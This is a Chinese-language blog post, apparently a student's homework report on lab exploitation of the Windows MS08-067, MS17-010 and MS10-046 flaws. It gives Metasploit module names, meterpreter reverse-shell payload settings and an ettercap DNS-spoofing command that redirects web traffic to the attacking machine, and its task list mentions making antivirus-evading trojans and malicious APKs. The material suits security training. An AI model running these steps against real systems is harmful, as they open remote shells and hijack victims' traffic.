zoukankan      html  css  js  c++  java
  • 010706侯舒舒(作业漏洞测试)

    2020 01 07

    任务

    1. 完成三个实验(ms08067,ms17010,ms10046)
    2. 上述三个实验的具体实验过程(漏洞成因,影响版本等;写md,生成为pdf发送)
    3. 拓展实验:生成免杀木马文件,生成恶意的apk

    第一个实验

    1. ms08-067
      • 实验名称
        • ms08-067
      • 实验环境
        • 攻击机 kali
        • 靶机 xp
      • 实验原理
        • windows的server服务在处理特质请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意命令。
      • 实验步骤
        • 先使用search搜寻一下
        • 在使用use exploit/windows/smb/ms08_067_netapi
        • 在show options查看
        • 在设置攻击载荷set payload windows/meterpreter/reverse_tcp
        • 设置攻击地址,和受害者地址。set rhost 192.168.226.131,set lhost 192.168.226.130
        • 攻击 run
          • 攻击成功截图

    第二个实验

    1. ms17-010
      • 实验名称
        • ms17-010
      • 实验原理
        • Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序
      • 实验环境
        • 攻击机 kali
        • 靶机 Windows 7
      • 实验步骤
        • 先使用search搜寻一下
        • 在使用use exploit/windows/smb/ms17_010_eternalblue
        • 在show options查看
        • 在设置攻击载荷set payload windows/64/meterpreter/reverse_tcp
        • 设置攻击地址,和受害者地址。set rhost 192.168.226.132,set lhost 192.168.226.130
        • 攻击 run
          • 攻击成功截图

    第三个实验

    1. ms10-046
      • 实验名称
        • ms10-046
      • 实验环境
        • 攻击机 kali
        • 靶机 xp
      • 实验原理
        • Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞
      • 实验步骤
        • 先使用search搜寻一下
        • 在使用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
        • 在show options查看
        • 在设置攻击载荷set payload windows/meterpreter/reverse_tcp
        • 设置攻击地址,和反转地址。set svhost 192.168.226.130,set lhost 192.168.226.130
        • run攻击等待
        • 进入/etc/ettcap/ 下的etter.dns 最下面加入一句*.com A 192.168.226.130
        • 使用ettercap -T -q -i eth0 -P dns_spoof //// 劫持网段
        • 最后靶机输入地址都会跳转到我们给的地址
          • 跳转截图
  • 相关阅读:
    SVN还原项目到某一版本(转)
    C# Web Service 不使用服务引用直接调用方法(转)
    动态调用webservice时 ServiceDescriptionImporter类在vs2010无法引用的解决方法 (转)
    log4net示例2-日志输入存入Access(转)
    C# log4net 配置及使用详解--日志保存到文件和Access(转)
    未能解析引用的程序集......因为它对不在当前目标框架“.NETFramework,Version=v4.0,Profile=Client”中的 (转)
    Hello log4net——做一个实用好用的log4net的demo(转)
    JS移动客户端--触屏滑动事件
    js生成二维码实例
    触屏版类似刷新页面文本框获取焦点的同时弹出手机键盘的做法
  • 原文地址:https://www.cnblogs.com/demohou/p/12176509.html
Copyright © 2011-2022 走看看